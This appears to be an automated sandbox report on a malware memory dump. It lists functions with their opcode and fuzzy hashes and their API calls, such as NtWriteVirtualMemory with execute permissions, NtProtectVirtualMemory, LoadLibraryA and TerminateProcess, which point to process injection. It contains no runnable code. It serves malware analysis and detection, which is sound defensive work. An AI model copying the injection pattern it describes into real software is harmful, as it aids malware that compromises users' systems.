Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a890e6c55b9c9a86b77d73acf049d0147c9132eef27d3304768f0cd9a036b3d5
Instruction ID: e92b9ef724566f0a3a97eed37ac5168f43c13202fbcd1498b59bd496b4824c14
Opcode Fuzzy Hash: a890e6c55b9c9a86b77d73acf049d0147c9132eef27d3304768f0cd9a036b3d5
Instruction Fuzzy Hash: 73512672380309AFEF235E10ED85BE8366AEF16340F644126FE85DA2C0C7B99CD99645

Uniqueness

Uniqueness Score: -1.00%

Function 003D3DEF, Relevance: 1.6, APIs: 1, Instructions: 142nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 5daff0bc426f5e38b177338aa4dd9485daf3084f09c8d19665fa4340b685ec30
Instruction ID: 06b40efef0eaf246dc4af84bbf87043ef1f081b20becd5a2fdef645ecc8d625d
Opcode Fuzzy Hash: 5daff0bc426f5e38b177338aa4dd9485daf3084f09c8d19665fa4340b685ec30
Instruction Fuzzy Hash: 834124B2340309AFEF235F10ED81BE936AAFB16340F644112FE859A2D0C7B99CD99645

Uniqueness

Uniqueness Score: -1.00%

Function 003D3E5F, Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a21470b705205fa81d16738d45e4a91d821e5642ae2a1c6c3754ec39627c0ab5
Instruction ID: 4d4947289818f5f553cf74503a62187dfd806986785282cb60b4befa1213e26c
Opcode Fuzzy Hash: a21470b705205fa81d16738d45e4a91d821e5642ae2a1c6c3754ec39627c0ab5
Instruction Fuzzy Hash: 78412472240209AFEF275F20ED807E936AAFF16340F644212FD89DA280C7B98CD99641

Uniqueness

Uniqueness Score: -1.00%

Function 003D3EAF, Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: c0ef1b4fde15fe5134af38a8089304ce632d9036f79deb90f454893bf701b36f
Instruction ID: c405ef4d0f99f7dbc899427101ad5c5266d2225b1b1ccc1c8459f0a14d584641
Opcode Fuzzy Hash: c0ef1b4fde15fe5134af38a8089304ce632d9036f79deb90f454893bf701b36f
Instruction Fuzzy Hash: 07315672640309AFEF235F20ED807ED36AAFF16340F544212FD89DA284C7B998D9C645

Uniqueness

Uniqueness Score: -1.00%

Function 003D3F07, Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 527620bc734d7f4eac0229477389fa6ec6c0358165122b8b073706ac084a51c4
Instruction ID: b46eb0df4503a9c85c92f26d7b42d1e5067932af6db399a0b64123d4457ac8cc
Opcode Fuzzy Hash: 527620bc734d7f4eac0229477389fa6ec6c0358165122b8b073706ac084a51c4
Instruction Fuzzy Hash: F93158B2240309AFEF235F60ED80BED36AAFF16340F504212FD899A284C77998D9C644

Uniqueness

Uniqueness Score: -1.00%

Function 003D7EE5, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e45a8546300e55adb538ba4ffa71ae6eece5fb1e3c1bd1cfd0ff0e326a377e3e
Instruction ID: 55acd849936b0811f6d146674627d1e35942146736a232bc0ca2739d1102ac6b
Opcode Fuzzy Hash: e45a8546300e55adb538ba4ffa71ae6eece5fb1e3c1bd1cfd0ff0e326a377e3e
Instruction Fuzzy Hash: 1721FB6B21C101EFDA33A724F952FBE235D9B15310F704427F86787B56DF14A849A612

Uniqueness

Uniqueness Score: -1.00%

Function 003D3F88, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 7e15a588f6033d71ec2197ae5f4f7fc6fa39cac4fad0da29e6daf91056bdea26
Instruction ID: 16e38e04e0ef18f52cff1ba57498f0e3851998b81af8afaa08518b6d7f61279c
Opcode Fuzzy Hash: 7e15a588f6033d71ec2197ae5f4f7fc6fa39cac4fad0da29e6daf91056bdea26
Instruction Fuzzy Hash: BF213372240205AFDF275F60ED807ED3BAAFF16740F944212FD888A284DB3998D9D741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3FC8, Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 7d0fb29fc01b7a1bc4da1b0e4265d4717931a49b4b8ce0a54283e6e3574fab0d
Instruction ID: 210ac50e2c9ad5785fdb3734e562d454a213bf215e3907341c6a6fd782d57d8f
Opcode Fuzzy Hash: 7d0fb29fc01b7a1bc4da1b0e4265d4717931a49b4b8ce0a54283e6e3574fab0d
Instruction Fuzzy Hash: 87210572240205AFDF275F60ED807ED3AAAFF16340F944212FD899A284CB3998E5DB44

Uniqueness

Uniqueness Score: -1.00%

Function 003D404F, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: e33ee4a0d51ddd643661778af332441f55e87ab2b5a411853e48d68f821ae597
Instruction ID: 134214c6261567dcfa69dd71594c760d9c32a3fc0507dcfa8987fdc5a85e20e3
Opcode Fuzzy Hash: e33ee4a0d51ddd643661778af332441f55e87ab2b5a411853e48d68f821ae597
Instruction Fuzzy Hash: 8601DF72240208AFDF625F20EC90BE93BA6FF25300F951226FD4986290C73598E89B81

Uniqueness

Uniqueness Score: -1.00%

Function 003D99F7, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,003D92BD,00000040,003D0BE7,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003D9A42

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 544d4303f947564569569d90b97faccc82f52902e72b36a24bd4330ae574969a
Instruction ID: ce5c8dbf5da39cfac66c769ca8f16859bcd826f787ba0fb66430af061ae925c5
Opcode Fuzzy Hash: 544d4303f947564569569d90b97faccc82f52902e72b36a24bd4330ae574969a
Instruction Fuzzy Hash: F9E02BA64E4B104CAE111EF9DA0470E37A9C993E54768C354A5E0EC4CCEF34D0028559

Uniqueness

Uniqueness Score: -1.00%

Function 003D9A29, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,003D92BD,00000040,003D0BE7,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003D9A42

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 003D0EE0, Relevance: 3.3, APIs: 2, Instructions: 254serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 2226f088c2030cf27fe327011d3f4a5d3fad7f34a97f4912ff443bd114768d5a
Instruction ID: 78d3f937853fe95fd0ab623e4017d734a7bb56c7f626aa75890805eeb9fb620e
Opcode Fuzzy Hash: 2226f088c2030cf27fe327011d3f4a5d3fad7f34a97f4912ff443bd114768d5a
Instruction Fuzzy Hash: B971AC33604205BBDF372664F8917FE232E9F82740FB90527EC86DA781CA79D9C59112

Uniqueness

Uniqueness Score: -1.00%

Function 003D0DFB, Relevance: 3.2, APIs: 2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ef2ab549997b0dd6e49e897e26154a04667f86dcd91a5af7b63bd171771c1e29
Instruction ID: fbcf445bf5085a05049f143a4f726a0b81db6f2e2682c64884f4d8d896916027
Opcode Fuzzy Hash: ef2ab549997b0dd6e49e897e26154a04667f86dcd91a5af7b63bd171771c1e29
Instruction Fuzzy Hash: 05719C33644206BBDF372664F8917FE232E9F82740FB90527EC86DA785CA79D9C59102

Uniqueness

Uniqueness Score: -1.00%

Function 003D0E51, Relevance: 3.2, APIs: 2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194d0dec6927f25167e66653f4497e1409684542430fb0a6d70158813fd44fed
Instruction ID: 5713b0a9e550f517b1c3b16ad5073b7de54c01babcacc6f5fce76e5ea32859c6
Opcode Fuzzy Hash: 194d0dec6927f25167e66653f4497e1409684542430fb0a6d70158813fd44fed
Instruction Fuzzy Hash: 0F619B33644206BBDF3726A4F8917FE122E8F82700FBD0527EC86CA784CA79D9C59502

Uniqueness

Uniqueness Score: -1.00%

Function 003D0E99, Relevance: 3.2, APIs: 2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4b8e37622ffd40558d490d278e352567fe92d1c813bb44ad91659dadbbf536
Instruction ID: 2024d709d9171ba575c97a872e743c84d138b962c5071366cb977cc36096c47b
Opcode Fuzzy Hash: 0d4b8e37622ffd40558d490d278e352567fe92d1c813bb44ad91659dadbbf536
Instruction Fuzzy Hash: 35619C33644206BBDF3726A4F8517FD232E8F82700FB90527EC869A785CA79D9C59102

Uniqueness

Uniqueness Score: -1.00%

Function 003D0EF7, Relevance: 3.2, APIs: 2, Instructions: 217serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 66df196d64bf1cddb7aeaf1e49000d9f82163df0983de4e3b246ce4a550e4520
Instruction ID: 557b0a9be938c89ba86721dbe623aadc88b92643063f92409c0a516969877c12
Opcode Fuzzy Hash: 66df196d64bf1cddb7aeaf1e49000d9f82163df0983de4e3b246ce4a550e4520
Instruction Fuzzy Hash: BD518B33544205BBDF3726A4F8917FD232E8F82300FBD0527EC878A785CA7995C59502

Uniqueness

Uniqueness Score: -1.00%

Function 003D0FA7, Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8334fb24559b2fe8bb6f84e5507be4ac9b7d26f41f2f789224be2d92ebc2d8fd
Instruction ID: 916f7796d4ecea7cd52d841ccecccd0a9b460d5b3c51e495eb5fb60b2bb4d899
Opcode Fuzzy Hash: 8334fb24559b2fe8bb6f84e5507be4ac9b7d26f41f2f789224be2d92ebc2d8fd
Instruction Fuzzy Hash: 01518977644305ABDF372AA4F8517ED236A9F42740FFA0617ECC68A7C4CB7994858502

Uniqueness

Uniqueness Score: -1.00%

Function 003D0F2F, Relevance: 3.2, APIs: 2, Instructions: 214serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 2ea6e4fbe60880f2ea3aa373026f7a3436f9144eb27b5e9aa8814e1de87dbc50
Instruction ID: 24acd31bc0e47a874fa601b11c9068715c8032d38085939dab4e8b09b4cb5911
Opcode Fuzzy Hash: 2ea6e4fbe60880f2ea3aa373026f7a3436f9144eb27b5e9aa8814e1de87dbc50
Instruction Fuzzy Hash: 78518A37644245BBDF372664F8A17FE132E8F82700FBE0917EC868A785CA79D9C59502

Uniqueness

Uniqueness Score: -1.00%

Function 003D1027, Relevance: 3.2, APIs: 2, Instructions: 189serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: dc241ac8505c9927aa323b4004e1f54103dac617d765e281d7539ee3c8e587cd
Instruction ID: 211fcb96df617a551caa293db66a002e5c5e9899846ba243de40faef656e8317
Opcode Fuzzy Hash: dc241ac8505c9927aa323b4004e1f54103dac617d765e281d7539ee3c8e587cd
Instruction Fuzzy Hash: 51518B77A04349BBDF372A64F8517FD232A9F82700FB90617EC878A7C5CA7999C58502

Uniqueness

Uniqueness Score: -1.00%

Function 003D1061, Relevance: 3.2, APIs: 2, Instructions: 184serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 9edb7dc5a10f180e7f9378760926f3d02b926a37b5d58408a8fe15207eef7368
Instruction ID: c641b5ee449b055c8696e8710f384385422d6ac05a76e2244845fbb91da513f2
Opcode Fuzzy Hash: 9edb7dc5a10f180e7f9378760926f3d02b926a37b5d58408a8fe15207eef7368
Instruction Fuzzy Hash: C4517A77604349BBDF372A64F8517FD232A9F82700FB90917EC878A7C5CA7999858502

Uniqueness

Uniqueness Score: -1.00%

Function 003D10A1, Relevance: 3.2, APIs: 2, Instructions: 179serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 8299b00161a155f8a8a9bfa62cd0ff22bd5131f66edffe9ff82c23e77c917c6d
Instruction ID: 8170ef7d52f2c22d680a5beb0f123dd5b08017554f4f00526bb6879c61fea9bb
Opcode Fuzzy Hash: 8299b00161a155f8a8a9bfa62cd0ff22bd5131f66edffe9ff82c23e77c917c6d
Instruction Fuzzy Hash: 63518937644205BBEF372664F8517FE136E9F82740FB90907EC87CA7C5CA7999858102

Uniqueness

Uniqueness Score: -1.00%

Function 003D10EC, Relevance: 3.2, APIs: 2, Instructions: 172serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: b10d6f5904a99faacf34bb1205f4837c72c7cb7c6d2b7a37d9cf4455cb13842b
Instruction ID: 0a9af9f22710602c2178f8c25124028d541eedf798cbdefa4c69f3c9e6c120a1
Opcode Fuzzy Hash: b10d6f5904a99faacf34bb1205f4837c72c7cb7c6d2b7a37d9cf4455cb13842b
Instruction Fuzzy Hash: 52519A37544345BBDF372A64F8517FE232E9F82740FBA0A17EC868A7C5CB7999858102

Uniqueness

Uniqueness Score: -1.00%

Function 003D11AD, Relevance: 3.2, APIs: 2, Instructions: 155serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: e0952384be1dc55aa082685c373bcfd6f9e3301121946798a22df15a2af7a375
Instruction ID: 191d9403d6d528f4be05dc642ca03853433d3461c9b1658a6cfe9cf4e25abbbd
Opcode Fuzzy Hash: e0952384be1dc55aa082685c373bcfd6f9e3301121946798a22df15a2af7a375
Instruction Fuzzy Hash: 3D419937504305BADF371668F8957FE122E8F82750FBE0A17EC86CA7C4CB7A99858102

Uniqueness

Uniqueness Score: -1.00%

Function 003D11FD, Relevance: 3.1, APIs: 2, Instructions: 144serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: d533ea471d1fc106bb65ef8e0306cd784bfeee49466dcff6d9f04c895df6947c
Instruction ID: a444afcfe861a89cb5ffc467c6c4fd6803c97a02d0893e5d43044879c8255ff5
Opcode Fuzzy Hash: d533ea471d1fc106bb65ef8e0306cd784bfeee49466dcff6d9f04c895df6947c
Instruction Fuzzy Hash: E0418937544305BADF371A68F4917EE226A9F82740FBD0A07EC82C97C4CB7AD9858502

Uniqueness

Uniqueness Score: -1.00%

Function 003D11A6, Relevance: 3.1, APIs: 2, Instructions: 143serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: 63e784ee5677ca05fefba102364e1c4b19de15c0308071dd6e359831390d91da
Instruction ID: e783c087152a50ec5b7c889d296b859766d665d48164b8c17108ae718d675533
Opcode Fuzzy Hash: 63e784ee5677ca05fefba102364e1c4b19de15c0308071dd6e359831390d91da
Instruction Fuzzy Hash: 99417A33504249B7DF371618F8957FE123A9F82310FBA0917EC87967C1C67A99C59112

Uniqueness

Uniqueness Score: -1.00%

Function 003D1241, Relevance: 3.1, APIs: 2, Instructions: 136serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: ce318646c0a4c2f15c37e57bf60b944db55726cb53753147e5dda95d7282c3ca
Instruction ID: 033bd5ae3c51f3d68856d0c7bb938e00652d8e34870a7e781867ea25f5b9a003
Opcode Fuzzy Hash: ce318646c0a4c2f15c37e57bf60b944db55726cb53753147e5dda95d7282c3ca
Instruction Fuzzy Hash: 39418737504305AADF372B68F4913FD236A9F82700FBD4A17E882CA7C5CB7A99848502

Uniqueness

Uniqueness Score: -1.00%

Function 003D1283, Relevance: 3.1, APIs: 2, Instructions: 130serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: b66866cb07225b4882692e9fb1218b0e5d4642195f03d1bebd85ac58e4cdc915
Instruction ID: d656b3cf1e5968d9c7c256c06f4324a2a39f8c0ec73e1332dfefb99a310bd2ba
Opcode Fuzzy Hash: b66866cb07225b4882692e9fb1218b0e5d4642195f03d1bebd85ac58e4cdc915
Instruction Fuzzy Hash: 16418837544305AADF3B2B68F4913BD236A9F82340FBD4A17EC828A7C5CB7999848502

Uniqueness

Uniqueness Score: -1.00%

Function 003D12CD, Relevance: 3.1, APIs: 2, Instructions: 122serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: bc0715f4c501134a12bef270a7543cb92e30cc70cda92b1d9ae0b626fdb480b4
Instruction ID: d526a4c7777f31d80cc8a0cd9849624f7dc43212b0f77c6fb30d52f094b5ffb4
Opcode Fuzzy Hash: bc0715f4c501134a12bef270a7543cb92e30cc70cda92b1d9ae0b626fdb480b4
Instruction Fuzzy Hash: A031BD37544305AADF371AA8F4813AD236A9F82750F7D4A07EC92C97C4CB79D9858502

Uniqueness

Uniqueness Score: -1.00%

Function 003D1315, Relevance: 3.1, APIs: 2, Instructions: 113serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: 2918dcc00198736fe54da0142093f45ee7a796bffd1e38bbd29d5ae2d8c3ae65
Instruction ID: 058be69dc7d14ad15118a5a449c4010684c25b63ef76f9d9ed12a19c5a26a80e
Opcode Fuzzy Hash: 2918dcc00198736fe54da0142093f45ee7a796bffd1e38bbd29d5ae2d8c3ae65
Instruction Fuzzy Hash: 5F319A33144305AADF372BA8F4853AD237A9F82740FBD4A07EC92C97C5CB7A99848502

Uniqueness

Uniqueness Score: -1.00%

Function 003D136F, Relevance: 3.1, APIs: 2, Instructions: 102serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: 18184d7d3260ddd75a7beaca1a8a9225a4c46a5c71cdc2916e3106b2753b616b
Instruction ID: 3770897324fb8646eb2925a33223397bab28eda1c66038cde32b5d348ff3e304
Opcode Fuzzy Hash: 18184d7d3260ddd75a7beaca1a8a9225a4c46a5c71cdc2916e3106b2753b616b
Instruction Fuzzy Hash: 9531BE33144345AADF372BA8F8817EE237A9F82740FBD4617EC928A7C5CB7A9544C502

Uniqueness

Uniqueness Score: -1.00%

Function 003D13DD, Relevance: 3.1, APIs: 2, Instructions: 90serviceCOMMON

Download Yara Rule

APIs

